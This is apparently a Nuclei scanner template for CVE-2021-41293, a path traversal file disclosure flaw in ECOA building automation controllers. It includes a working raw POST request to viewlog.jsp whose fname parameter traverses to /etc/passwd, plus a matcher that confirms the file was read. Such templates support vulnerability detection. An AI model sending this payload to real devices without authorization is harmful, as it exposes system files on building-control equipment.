id: CVE-2021-41293

info:
  name: ECOA Building Automation System - LFD
  author: 0x_Akoko
  severity: high
  description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
    - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
  tags: cve,cve2021,ecoa,lfi,disclosure
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
    cve-id: CVE-2021-41293
    cwe-id: CWE-22

requests:
  - raw:
      - |
        POST /viewlog.jsp HTTP/1.1
        Host: {{Hostname}}

        yr=2021&mh=6&fname=../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200